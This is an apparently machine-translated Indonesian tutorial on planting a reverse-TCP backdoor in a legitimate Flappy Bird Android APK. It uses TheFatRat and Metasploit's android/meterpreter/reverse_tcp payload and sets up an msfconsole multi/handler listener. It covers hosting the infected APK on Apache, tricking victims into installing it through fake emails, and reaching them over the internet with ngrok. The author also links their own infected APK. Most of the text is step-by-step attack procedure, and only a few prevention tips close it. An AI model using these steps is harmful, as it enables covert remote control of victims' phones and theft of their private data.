Kami harus menetapkan titik, aplikasi seluler adalah pasar yang BESAR saat ini. Banyak pengusaha meninggalkan pengalaman berbasis web untuk membangun solusi seluler yang mengganggu. Pertempuran ponsel pintar tetap ada hari ini antara IO dan Android. Keduanya memiliki pro dan kontra, keduanya dirancang dan dikonfigurasi dengan pengaturan keamanan default yang mungkin tidak ideal untuk orang yang tidak berpengalaman.
Tulisan ini menunjukkan contoh praktis dan sederhana tentang cara membuat pintu belakang TCP Terbalik pada file APK yang ada.
Ini adalah “Serangan Rekayasa Sosial” yang cukup umum, dan berfokus pada pembuatan koneksi TCP terbalik, di mana penyerang dapat dengan mudah membuat akses shell ke ponsel Android Anda saat Anda menggunakan aplikasi yang terinfeksi dan melakukan beberapa hal berbahaya atau mengakses informasi pribadi tanpa kekhawatiran apapun.
Dan jika yang dimaksud dengan “Serangan Rekayasa Sosial” adalah karena cara penyebarannya, saya akan menjelaskan sedikit bagaimana fase tipikal serangan ini.
Demo ini dibuat di pengontrol dan lab lokal, tetapi dapat dilakukan di jaringan WAN dengan mudah.
Rekayasa Sosial (dengan kata sederhana)
Untuk menjelaskan konsep dengan sangat jelas, kita dapat membagi istilah menjadi dua elemen, di mana Sosial dapat ditetapkan sebagai kehidupan pribadi dan profesional, Teknik mengacu pada melakukan tugas dengan mengikuti langkah-langkah tertentu untuk mencapai target. Itu gabungan.
Rekayasa Sosial adalah istilah yang menggambarkan intrusi nonteknis yang sangat bergantung pada interaksi manusia dengan menipu orang lain untuk melanggar prosedur keamanan normal.
Ini sangat sederhana, sungguh. Ini semua tentang mengejek atau mengelabui orang untuk menggunakan atau mengunduh Malware dan memanfaatkannya untuk tujuan jahat.
Fase Rekayasa Sosial
Serangan tersebut dapat diringkas menjadi seperti ini:
Riset: mencoba mengumpulkan informasi tentang target, dikumpulkan dari berbagai sumber (tempat sampah hidup, situs web, dokumen, interaksi).
Hook: melakukan langkah awal dengan mencoba memulai percakapan dengan target yang dipilih setelah tahap penelitian selesai.
Mainkan: buat hubungan lebih kuat dan lanjutkan dialog untuk memanfaatkan hubungan dan mendapatkan informasi yang diinginkan.
Keluar: keluar dari lokasi serangan menghentikan komunikasi dengan target tanpa membuat keributan atau melakukan tindakan yang mencurigakan.
Lab yang berfungsi
Kali Linux 2018.4 64 bit tervirtualisasi di Oracle Virtualbox.
Samsung Galaxy S6 dengan Android 4.4 Kitkat dengan beberapa konfigurasi keamanan biasa.
Kedua mesin terhubung pada Jaringan LAN yang sama.
Alat
Alat utama untuk lokakarya ini adalah alat Eksploitasi FatRat, program ini ditulis pada Python, dapat dengan mudah menghasilkan pintu belakang pada aplikasi Android yang ada atau hampir semua perangkat lain yang tersedia dengan muatan yang diketahui dari Kerangka Metasploit (dan muatan lainnya juga). Alat ini dapat melakukan banyak hal lain, Anda dapat memeriksa halaman GitHub alat tersebut di sini.
Proses instalasinya cukup sederhana, hanya perlu diingat bahwa dapat memakan waktu cukup lama karena dependensi diinstal.
Penting: tingkatkan dan perbarui repositori Kali Anda sebelum menginstalnya, ini dapat menghemat waktu Anda.
Bagus, mari instal FatRat:
Gandakan repositori dari GitHub:
git clone https://github.com/Screetsec/TheFatRat.git
Di dalam repositori kloning, Anda akan mengubah hak akses pada file setup.sh untuk menjadikannya file yang dapat dieksekusi
cd TheFatRat
chmod + x setup.sh && ./setup.sh
Ikuti petunjuk
Di sisi lain, kami memiliki Kerangka Metasploit, ini adalah alat penetrasi Sumber Terbuka yang digunakan untuk mengembangkan dan menjalankan kode eksploitasi terhadap mesin target jarak jauh. Dapat digunakan untuk menguji kerentanan sistem komputer untuk melindungi mereka dan di sisi lain juga dapat digunakan untuk membobol sistem jarak jauh.
Alat luar biasa ini sudah diinstal di OS Kali Linux.
Mari kita berhenti sebentar.
Untuk saat ini (jika Anda baru pertama kali mendengar tentang Metasploit Framework) saya perlu membahas lebih dalam penjelasan ini, karena, ada beberapa istilah kunci yang mungkin sedikit membingungkan Anda. Saya sebelumnya mengatakan bahwa alat ini digunakan untuk menguji kerentanan, bukan? Kerentanan adalah kelemahan yang dapat membahayakan keamanan sistem apa pun.
Kerentanan ini dieksploitasi dengan menggunakan exploit, exploit ini mengacu pada kode perangkat lunak yang memungkinkan penyerang untuk memanfaatkan kerentanan.
Dan terakhir, ketika kerentanan dieksploitasi, payload bertindak, ini berarti, kami menjalankan beberapa kode pada sistem target untuk memungkinkan eksploitasi bertahan tepat waktu
Dengan semua yang dikatakan. Ayo bekerja.
Tangan di atas
Mari unduh APK bersih
Dalam contoh ini, saya mengunduh APK Flappy Bird dari sini
Ini adalah game APK asli.
Saya pribadi mengganti nama unduhan menjadi file flappybird.apk sederhana dan memindahkannya dari direktori unduhan ke folder khusus bernama backdooring-android (ini opsional)
Menggunakan FatRat
Ketika saya menginstal FatRat di Kali saya, penginstal bertanya apakah saya ingin mengatur perintah fatrat secara global, saya menjawab ya, ini mungkin bisa berbeda dari proses Anda
Dengan mengetikkan fatrat, sistem akan mengevaluasi dan mengkonfigurasi layanan yang diperlukan dan tersedia
Ketik 5, untuk Backdooring APK Asli [Instagram, Line, dll]
Siapkan Host Lokal (LHOST) dan Port Lokal (LPORT). Ini akan mewakili alamat IP mesin Host (Kali) dan port yang tidak digunakan untuk mendengarkan kembali jabat tangan sesi TCP (saya akan menjelaskan ini nanti)
Sekarang, kita harus mengetikkan jalur lokasi flappybird.apk, dalam kasus saya di /root/backdooring-android/flappybird.apk
Menyiapkan payload (istilah Metasploit) untuk TCP terbalik. Pilih opsi 3: android / meterpreter / reverse_tcp
Pilih 1: Gunakan Backdoor-apk 0.2.2 ini adalah alat untuk membuat APK yang terinfeksi
Dan itu dia. Sementara itu FatRat akan mendekompilasi APK asli dan setelah beberapa proses internal akan menghasilkan APK baru yang terinfeksi dengan nama default app_backdoor.apk
Setelah ini, kita mengatur generate listener ke no, kita akan membuatnya secara manual menggunakan Metasploit Framework
Membuat Pendengar secara manual
Bagian kedua dari serangan ini terdiri dari pengaturan Host Machine (Kali) sebagai pendengar pada koneksi TCP dua arah, yang merupakan tujuan utama dari serangan shell Reverse TCP melalui Social Engineering. Serangan tersebut akan memiliki akses shell ke mesin Android tanpa pemberitahuan pengguna.
Mari kita mulai dengan memulai perintah msfconsole
> msfconsole
Setelah ini, kami mengatur eksploitasi multi / penangan seperti ini
> gunakan multi / handler
Nanti setting payload (sama pada proses FatRat)
> setel PAYLOAD android / meterpreter / reverse_tcp
> setel LHOST [sama dengan IP Kali Anda]
> setel LPORT [Sama seperti proses FatRat]
> mengeksploitasi (menjalankan)
Apache di Kali
Memeriksa status layanan Apache (sudah terpasang)
systemctl status apache2
Memulai layanan
systemctl mulai apache2
Menempatkan backdoor yang terinfeksi (berganti nama atau tidak) untuk korban
/ var / www / html /
Penutup
Dalam lingkungan jaringan LAN ini, penyerang perlu mengekspos APK baru yang terinfeksi ini di Server Apache kepada korban, dengan mengirimkan email palsu dengan tautan atau cara lain untuk mengelabui orang agar mengunduh “FlappyBird.apk” baru di Perangkat Android.
Setelah korban mengunduh aplikasi dan membukanya, sesi baru pada pendengar akan berhasil dibuat, menggunakan shell meterpreter (payload). Penyerang sekarang memiliki akses penuh untuk menargetkan serangan khusus atau melakukan eskalasi hak istimewa dari CLI.
Anda dapat membuat daftar sesi, seperti:
> sesi
Dan Anda juga dapat memilih dan berinteraksi dengan sesi aktif menggunakan tanda -i
> sesi -i 1
APK yang saya hasilkan
Anda dapat mengunduh file FlappyBird.apk saya yang terinfeksi di sini
Saya tidak yakin apakah dengan mengatur mesin Kali Anda dengan alamat IP statis seperti yang saya dulu, dapat membuat Malware ini berfungsi dengan benar. Tetapi, jika demikian, alamat IP saya yang berfungsi adalah alamat IP kelas C 192.168.2.120 dan port 4444.
Dari LAN ke WAN
Cara sederhana untuk menskalakan alamat IP lokal menggunakan alat tunneling sederhana yang disebut ngRok. Alat ini mengubah 127.0.0.1 sederhana menjadi sesuatu yang dapat diakses oleh semua publik.
Periksa dokumen untuk langkah-langkah penginstalan dan penyiapan authtoken.
Setelah itu Anda bisa mengatur perintah ngrok untuk koneksi TCP, seperti:
> ngrok tcp 1234 untuk protokol TCP pada protokol 1234
Keseluruhan prosesnya sama, tetapi Anda perlu mengganti LHOST (Antarmuka web dari ngrok) dan LPORT (port dari koneksi TCP ngrok) ke elemen yang diberikan ngrok kepada Anda.
Tips untuk mencegah
Selalu perbarui perangkat Android Anda (tambalan dan versi OS)
JANGAN PERNAH mengunduh .apk apa pun dari sumber yang tidak tepercaya
Selalu periksa URL untuk nama domain yang salah eja yang disengaja
Didik diri Anda sendiri
Selamat Berburu 🙂
